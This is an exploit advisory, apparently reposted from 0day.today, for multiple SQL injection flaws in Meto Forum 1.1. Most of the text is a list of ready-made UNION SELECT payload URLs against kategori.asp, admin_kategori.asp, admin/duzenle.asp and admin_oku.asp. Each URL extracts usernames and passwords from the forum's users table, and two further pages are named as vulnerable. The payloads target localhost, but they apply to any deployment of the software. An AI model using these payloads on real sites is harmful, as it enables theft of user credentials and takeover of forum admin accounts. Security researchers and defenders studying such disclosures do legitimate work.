Meto Forum 1.1 Multiple Remote SQL Injection Vulnerabilities

============================================================
Meto Forum 1.1 Multiple Remote SQL Injection Vulnerabilities
============================================================



-\--\--\--\--\--\--\--\--\--\--\--\--\--\--\--\--\--\--\--\--\--\
                                                        
Meto Forum v1.1 Multiple Remote SQL Iinjectin Vulnerable  
                                                                          
                                                              
Risk   : Forum in All users saved password is to take.        
                                                              
Coded : Asp , SQL Language = 'Acces'                   
                                                             
-\--\--\--\--\--\--\--\--\--\--\--\--\--\--\--\--\--\--\--\- -\-/


EIP [1] Exploit:


http://localhost:2222/lab/MetoForumV1/forum/kategori.asp?kid=20+union+select+0,kullanici,2,3,4,parola,6+from+uyeler&y=SnnX%20Mesaj%20Panosu%20Test


Log in Admin Panel > cookie Saved , 
This Script file have SQL Injectin atack. 


http://localhost:2222/lab/MetoForumV1/forum/admin_kategori.asp?kid=1+union+select+0,1,parola,3,4,kullanici,6+from+uyeler+where+id=1  2,3,4,5,6


http://localhost:2222/lab/MetoForumV1/forum/admin/duzenle.asp?id=1+union+select+0,kullanici,parola,3,4,5,1+from+uyeler



http://localhost:2222/lab/MetoForumV1/forum/admin_oku.asp?id=1%20union%20select%200,1,2,3,4,5,1,6,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,7,8,9,1,1,1,1%20from%20uyeler



[ESP][2]

Other have sql injection atack file :

uye.asp 
oku.asp

-\--\--\--\--\--\--\--\--\--\--\--\--\--\--\--\--\--\--\--\- -\-



Discovered By U238 |Ugur Can Engin |

Web - Designer Developer Solutions

pgp key --> http://ugurcan.by.ru/U238.asc

Friends --> < Teyfik Cevik - ka0x - The_BekiR - Erhan Bulut - Caborz - Nettoxic - fahn - ZeberuS >

Dunyan?n En buyuk Ve En Zeki Lideri Olan  Mustafa Kemal Ataturk'u Selamlar?m.



#  0day.today [2018-01-01]  #